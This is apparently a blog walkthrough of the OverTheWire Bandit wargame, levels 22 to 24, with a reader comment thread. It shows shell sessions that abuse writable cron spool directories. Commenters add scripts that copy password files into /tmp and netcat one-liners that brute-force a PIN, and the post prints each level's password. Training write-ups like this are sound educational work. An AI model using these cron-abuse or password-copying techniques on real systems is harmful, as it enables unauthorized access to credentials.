Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI
Level 22->23:
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
We visit cron again, this time the script cron executes is a little more complicated. It creates a file in /tmp that is the result of an md5 hashing process combined with a username which creates the name of the file that will hold the password. In other words, when ran, it will provide the name of the file in the /tmp directory that the password is being dumped to. Let’s fill in the blanks for it as bandit23 and see what happens.
bandit22@melissa:~$ cd /etc/cron.d bandit22@melissa:/etc/cron.d$ ls boobiesbot-check eloi1 semtex0-64 semtex6 vulnbot0-check cronjob_bandit22 hintbot-check semtex0-ppc semtex8 vulnbot1-check cronjob_bandit23 manpage3_resetpw_job semtex10 semtex9 cronjob_bandit24 php5 semtex12 vortex0 eloi0 semtex0-32 semtex5 vortex20 bandit22@melissa:/etc/cron.d$ cat cronjob_bandit23 * * * * * bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null bandit22@melissa:/etc/cron.d$ cat /usr/bin/cronjob_bandit23.sh #!/bin/bash myname=$(whoami) mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1) echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget" cat /etc/bandit_pass/$myname > /tmp/$mytarget #Run the script: bandit22@melissa:/etc/cron.d$ echo I am user bandit23 | md5sum | cut -d ' ' -f 1 8ca319486bfbbc3663ea0fbe81326349 #Check contents of that file in /tmp: bandit22@melissa:/etc/cron.d$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349 jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n
There we have it, the password for bandit23 awaits us.
Level 23->24:
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
Our final challenge is complicated more. There are a couple of ways to complete this challenge as well, but I think the way im about to do it is one of the better ways. We can see that the cronjob for bandit24 is running all scripts in the /var/spool/bandit24 directory. Unfortunately, we do not have permissions to see the files in that directory. This is vulnerable because although we can not read that directory, we can add scripts to it and the script will be executed as bandit24. Let’s add a script in that directory that list all the files in that directory.
bandit23@melissa:~$ cd /etc/cron.d bandit23@melissa:/etc/cron.d$ ls boobiesbot-check eloi1 semtex0-64 semtex6 vulnbot0-check cronjob_bandit22 hintbot-check semtex0-ppc semtex8 vulnbot1-check cronjob_bandit23 manpage3_resetpw_job semtex10 semtex9 cronjob_bandit24 php5 semtex12 vortex0 eloi0 semtex0-32 semtex5 vortex20 bandit23@melissa:/etc/cron.d$ cat cronjob_bandit24 * * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null bandit23@melissa:/etc/cron.d$ cat /usr/bin/cronjob_bandit24.sh #!/bin/bash myname=$(whoami) cd /var/spool/$myname echo "Executing and deleting all scripts in /var/spool/$myname:" for i in *; do echo "Handling $i" ./$i rm -f $i done #Let's begin the process to create our script: bandit23@melissa:/etc/cron.d$ mkdir /tmp/cccc bandit23@melissa:/etc/cron.d$ cd /tmp/cccc bandit23@melissa:/tmp/cccc$ vi dump.sh #!/bin/bash ls -la >> /tmp/cccc/list.txt #chmod 777 is probably overkill, this stuff gets erased. bandit23@melissa:/tmp/cccc$ chmod 777 dump.sh bandit23@melissa:/tmp/cccc$ chmod -R 777 /tmp/cccc bandit23@melissa:/tmp/cccc$ cp dump.sh /var/spool/bandit24/ #Wait one minute for the cronjob to run then check our list.txt file: bandit23@melissa:/tmp/cccc$ cat list.txt total 100 drwxr-xr-x 2 root root 4096 2013-01-03 16:39 . drwxr-xr-x 94 root root 4096 2013-03-18 15:53 .. -rw-r--r-- 1 root root 54 2013-01-03 16:39 boobiesbot-check -rw-r--r-- 1 root root 61 2012-07-05 09:34 cronjob_bandit22 -rw-r--r-- 1 root root 61 2012-07-05 09:34 cronjob_bandit23 -rw-r--r-- 1 root root 61 2012-07-05 09:35 cronjob_bandit24 -rw-r--r-- 1 root root 35 2012-03-29 14:16 eloi0 -rw-r--r-- 1 root root 35 2012-04-07 18:33 eloi1 -rw-r--r-- 1 root root 51 2012-12-23 00:06 hintbot-check -rw------- 1 root root 233 2012-09-14 13:16 manpage3_resetpw_job -rw-r--r-- 1 root root 506 2012-06-19 03:06 php5 -rw-r--r-- 1 root root 102 2011-01-05 11:23 .placeholder -rw-r--r-- 1 root root 58 2011-11-13 23:08 semtex0-32 -rw-r--r-- 1 root root 58 2011-11-13 23:08 semtex0-64 -rw-r--r-- 1 root root 59 2011-11-13 23:08 semtex0-ppc -rw-r--r-- 1 root root 36 2011-11-25 14:00 semtex10 -rw-r--r-- 1 root root 143 2011-11-13 23:08 semtex12 -rw-r--r-- 1 root root 35 2011-11-13 23:08 semtex5 -rw-r--r-- 1 root root 29 2011-11-13 23:08 semtex6 -rw-r--r-- 1 root root 96 2011-11-25 14:00 semtex8 -rw-r--r-- 1 root root 134 2011-11-13 23:14 semtex9 -rw-r--r-- 1 root root 29 2011-11-13 23:07 vortex0 -rw-r--r-- 1 root root 30 2012-03-24 21:00 vortex20 -rw-r--r-- 1 root root 52 2012-12-23 00:06 vulnbot0-check -rw-r--r-- 1 root root 52 2012-12-23 00:06 vulnbot1-check total 93 drwx-wx--- 13 bandit24 bandit23 1024 2013-03-21 02:44 . drwxr-xr-x 6 root root 4096 2012-07-05 09:24 .. -rw-r--r-- 1 bandit23 bandit23 130 2012-10-30 20:50 .aaa.sh drwxr-xr-x 2 bandit23 bandit23 1024 2013-01-21 03:15 asdsd -rw------- 1 bandit23 bandit23 12288 2012-06-05 15:22 .a.sh.swo drwxr-xr-x 2 bandit23 bandit23 1024 2013-02-25 11:35 bandit23 drwxrwxrwx 2 bandit23 bandit23 1024 2013-03-11 20:15 bandit24 -rw------- 1 bandit23 bandit23 12288 2012-10-14 17:23 .catpass.sh.swp -rwxr-xr-x 1 bandit23 bandit23 42 2013-03-21 02:44 dump.sh drwxr-xr-x 2 bandit23 bandit23 1024 2012-12-20 18:31 galo -rw------- 1 bandit23 bandit23 12288 2012-11-14 04:45 .getpass.swp drwxrwxrwx 2 bandit23 bandit23 1024 2013-03-13 22:07 inhere drwxr-xr-x 2 bandit23 bandit23 1024 2012-07-06 13:26 lolwut drwx------ 2 root root 12288 2012-05-30 14:18 lost+found drwxr-xr-x 2 bandit23 bandit23 1024 2013-02-23 21:44 pass drwxr-xr-x 2 bandit24 bandit24 1024 2012-12-30 12:44 passjurgen -rw-r--r-- 1 bandit24 bandit24 33 2012-10-13 09:33 .plop -rw------- 1 bandit23 bandit23 12288 2013-01-23 19:13 .shellcode.swo -rw------- 1 bandit23 bandit23 12288 2013-01-23 19:03 .shellcode.swp drwxr-xr-x 2 bandit23 bandit23 1024 2012-09-28 14:24 sub -rw-r--r-- 1 bandit23 bandit23 3 2012-09-28 14:38 .t1 -rw-r--r-- 1 bandit23 bandit23 3 2012-09-28 14:38 .t2 -rw-r--r-- 1 bandit23 bandit23 3 2012-09-28 14:38 .t3 drwxr-xr-x 2 bandit23 bandit23 1024 2012-11-27 17:46 zdenial #Nice, we see some interesting files, lets' go to this one: bandit23@melissa:/tmp/cccc$ cd /var/spool/bandit24/pass bandit23@melissa:/var/spool/bandit24/pass$ ls pass bandit23@melissa:/var/spool/bandit24/pass$ cat pass UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
And there is the password for the last level. All though we can log in to level24, there is nothing more to do. Congratulations, I hope you have learned something from this and found it interesting. Submit a new level for us or move on to the other servers. Leviathan is generally recommended next…
Level 24->25:
This level does not yet exist…
Reblogged this on Jareds blog and commented:
Awesomw walkthrough
thanks!
Hey ! Prettt impresive walktrough but why not using nmap’s -sV option to identify the service of the port and you would get 31790 !
Excellent point, im actually in the challenge right now figuring why I would have done that. I think I know why. When scanning the same port range, with the -sV option, I get this: 31790/tcp open msdtc Microsoft Distributed Transaction Coordinator (error). On two different ports (31518 and 31790). This probably didn’t strike me as having SSL on it, or may have even been different at one point. Either way, you need to manually connect to see that port 31790 is the right one. Cheers.
Thnx.
I was confused about some tasks and your blog helped me a lot!
Well, I guess they changed something in level 23 > 24
My dump.sh looks like this:
bandit23@melinda:/tmp/ccccc$ cat dump.sh
#!/bin/bash
ls -la >> /tmp/ccccc/list.txt
The list.txt file looks like this:
bandit23@melinda:/tmp/ccccc$ cat list.txt
total 6
drwxrwxrwx 2 bandit24 bandit23 1024 Feb 25 22:56 .
drwxr-xr-x 6 root root 4096 Jun 6 2013 ..
-rwxrwxr-x 1 bandit23 bandit23 44 Feb 25 22:56 dump.sh
Same here!
I suspected so, and I changed my script accordingly.
Instead of looking for the gold in the directory, I get the cron job to copy the password out to my temp folder.
#!/bin/sh
Pass=$(cat /etc/bandit_pass/bandit24)
echo $Pass >> /tmp//password.txt
As per rundata’s guide, you will have to ensure that your file is 777 in permission as well as the folder /tmp/
Have fun 😉
Regards,
JS.
Sorry, it filtered out my angle brackets. Your directory should be /tmp/your_self_created_directory/
This applies to the bash script and the 777 permission portion. (not /tmp/)
great walk through, thanks!
the chmod -R 777 /tmp/ is the reason i spent an hour for nothing 😦
Thanks for the guide!
hi. your stuff is interesting 🙂 it helped me alot
except that for the last one it was kinda…complicaed? I found a very easy solution:
cd /ec/cron.d
ls
cat cronjob_bandit24
cat /usr/bin/cronjob_bandit24.sh
cd /var/spool/bandit24
ls
cd /var/spool/bandit24/tmp
ls
cat bandit24pass (or cat bandit24 wich works too )
et voilaa
newb ?
After finding the psswd for bandit1.
Am I supposed to start a new login session with username bandit1 and the passwd from the readme file?
Which im pretty sure it is what im supposed to do.
I just keep getting access denied.
Also my putty session gets kicked by the server.
disregard my post
user error copy n paste fixed that for me.
In level 0 i do the command: cat /README.txt and it just prompts text in the terminal, and no password -.- cand u help me?
Try reading.
Good job on posting this bro! I’m a little late but I just realized that Level 24 > Level 25 now exist so I’m happy to paste my way of solving it here…
Level 24 > Level 25 My Solution:
#Create a folder called bf25 on /tmp to work on it and switch to that folder
mkdir /tmp/bf25/
cd /tmp/bf25/
#create a file with the password, repeat that 10000 times
printf ‘UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ\n%.0s’ {1..10000} >> pass.txt
#Create a file with all possible pins
seq -w 0 1 9999 > pin.txt
#Join the two files with “paste”
paste -d ‘ ‘ pass.txt pin.txt > brute_force.txt
#Feed the file to netcat and send the data to the port, exclude wrong #answers with ‘grep’
nc localhost 30002 < brute_force.txt | grep -v "Wrong"
#Congrats! You got the password!
Hey,
posting solutions to an ongoing and maintained wargame really sucks. These games should be educational and challenging for every body. Please keep your solutions (AND ESPECIALLY THE FUCKING PASSWORDS) private. Thank you very much.
Cheers,
morla
I’ve recently considered this. And have over the years pondered the educational merit of not allowing solutions to be viewed. Sure, tough love has more honor in it, but it doesn’t necessary help anyone understand anything better. In the beginning, a hacker doesn’t have the tool set to attack problems that may take several weeks or months to solve.
If they spent that much time melting their minds on a challenge site solution, they would be hindering their learning curve. They want information, a ton of it, and fast. They absorb. There will always be the type out there who consistently look for the easy way. But who are they really hurting? Don’t get it twisted. It is your duty to share knowledge.
Hey,
I like what you said. I was thinking about it in the beginning when I read on their website not to use guides and just try and do it yourself. Practice is important but I also think that guides like this one feed people’s desire for knowledge and they make you understand quickly what and why is something exploitable. Like you said, you only hurt yourself if walk through guides are the only thing you use to learn.
It will forever be a argument with wargame sites. On one hand it’s great to have worked through a problem and found a solution. On the other after you have tried and tried on a solution, you may just have syntax on one character wrong, which if discovered, would be remembered therefore you are still learning. Be resourceful.
Hey! I’ve been using this post as a fallback whenever I get stuck for hours on a particular level. I just ran into an issue with 16>17. I paste the key into the file when vim gets opened, and I save it. When I establish a connection as bandit17 with -i sshkey.private , it asks me for a sshkey passphrase. Am I doing something wrong?
hello please do not be to harsh i am new to this and want to understand why you use some of the commands you do. on level 8 how to you know to use -u?
You gotta read the man page on it, then google for example usage.
For level 24 > 25
for i in `seq -w 0000 9999` ; do echo “$(cat /etc/bandit_pass/bandit24) $i” | nc localhost 30002 >> /tmp/list.txt ; done
You do know you don’t need to pipe `cat` to `grep`? You can simply do `grep millionth data.txt`?
We do now. Good eye.
How can I change my last comment to checkmark notify of new comments?
You’ll get a notification when i’ve approved your comment.
Why are none of my comments showing up -.-.
Who dat saying their comments don’t turn up?
I am on bandit0->1. I have got the password and no matter if I ctrl+v the password or type the password for ssh to bandit1 it fails…Access denied.
Are you sure you got the password? They have probably changed the password or the level was under maintenance.
I also have a similar problem, in bandit1->bandit2 i try to “cat ./-” but it says permission denied. Where do i have to put the password? i’m confused
the same happens with me i cant login to anything other than bandit0
Cameron, Thanks a lot of putting the solutions out there! It is greatly appreciated.
You are very welcome Peter.
Pingback: Harjoitus 2 | Linux Kokeilut
Yeah, I don’t get why you posted passwords for each level. You beat the game and have also mastered being a douchebag.
If you would rather just input the given password then you are only cheating yourself.
I have obtained the password in level 1 (the readme file). But I can’t log in in the new level? Can someone help me? The command I’m using is bandit1@bandit.labs.overthewire.org -p 2220, but it doesn’t work
cant do 23 > 24 now
bandit23@bandit:/tmp/pppp$ cd /var/spool/bandit24/pass
-bash: cd: /var/spool/bandit24/pass: No such file or directory
doesnt exist must have changed something here
help pls
Yes, often they will change the solution a little. But it’s not far off…
Level 5-> 6:
You used -size option to specify the size of the file but there is no -size option in file manual. Where can i find it? THX
It a flag common to some bash commands, like find for example. Search the man pages: https://linux.die.net/man/1/find
Pingback: Https access denied message after putty login Portal Guide Instructions Help - centtip.com
Need more info. Wrong port, pass, or username? Expired session, etc. Did they change the password? This happens sometimes.